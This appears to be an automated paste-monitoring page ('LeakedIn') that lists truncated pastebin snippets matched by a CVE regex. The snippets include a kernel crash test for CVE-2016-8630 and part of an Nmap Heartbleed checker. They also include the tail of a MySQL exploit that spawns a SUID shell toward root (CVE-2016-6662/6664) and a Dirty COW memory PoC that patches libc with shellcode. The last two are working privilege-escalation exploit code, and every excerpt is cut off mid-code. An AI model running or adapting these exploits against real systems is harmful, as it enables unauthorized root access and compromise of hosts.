LeakedIn Logo
Stories About Data Leaks and Related Stuff

Posts Tagged ‘CVE Reference’

CVE Reference

0 votedvote

Detected 2 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

/* gcc -o test-cve-2016-8630 test-cve-2016-8630.c */

#include <stdio.h>

main(int argc, char *argv)
    asm volatile(".byte 0xc7\n.byte 0x15\nnop\nnop\nnop\nnop");
    printf("I did not crash this time.\n");
    return 0;

Source: http://pastebin.com/raw.php?i=sAhX3v1d

CVE Reference

0 votedvote

Detected 3 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

ms protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.

    references = {
      'http://www.openssl.org/news/secadv_20140407.txt ',

  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  local test_vers = arg_protocols

  if type(test_vers) == 'string' the

Source: http://pastebin.com/raw.php?i=kUx4qUkU

CVE Reference

0 votedvote

Detected 4 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

ID shell\033[0m: \n\n", cnt);
     system("ls -l " SUID_SHELL);

     printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n");
     system(SUID_SHELL " -p -i ");
     //system(SUID_SHELL " -p -c '/bin/bash -i -p'");

     /* close MySQL connection and exit */
     printf("\n[+] Job done. Exiting\n\n");
     return 0;


Source: http://pastebin.com/raw.php?i=P7HUhERM

CVE Reference

0 votedvote

Detected 2 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

ang:fact-ref name="cpe:/a:microsoft:excel:2010:sp2:~~~x64~~"/>

Source: http://pastebin.com/raw.php?i=6UJs99m7

CVE Reference

1 votedvote

Detected 1 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

 * CVE-2016-5195 dirtypoc
 * This PoC is memory only and doesn't write anything on the filesystem.
 * /!\ Beware, it triggers a kernel crash a few minutes.
 * gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread

#define _GNU_SOURCE
#include <err.h>

Detected 7 occurrence(s) of ‘shellcode’:


	mem_arg.unpatch = malloc(sizeof(SHELLCODE)-1);
	if (mem_arg.unpatch == NULL)
		err(1, "malloc");

	memcpy(mem_arg.unpatch, (void *)getuid_addr, sizeof(SHELLCODE)-1);
	memcpy(mem_arg.patch, SHELLCODE, sizeof(SHELLCODE)-1);
	mem_arg.patch_size = sizeof(SHELLCODE)-1;
	mem_arg.do_patch = true;

	fd = open(LIBC_PATH, O_RDONLY);
	if (fd == -1)
		err(1, "open(\"" LIBC_PATH "\")");
	if (fstat(fd, &st) == -1)
		err(1, "fstat");

	mem_arg.map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
	if (mem_arg.map == MA

Source: http://pastebin.com/raw.php?i=N9hqimkz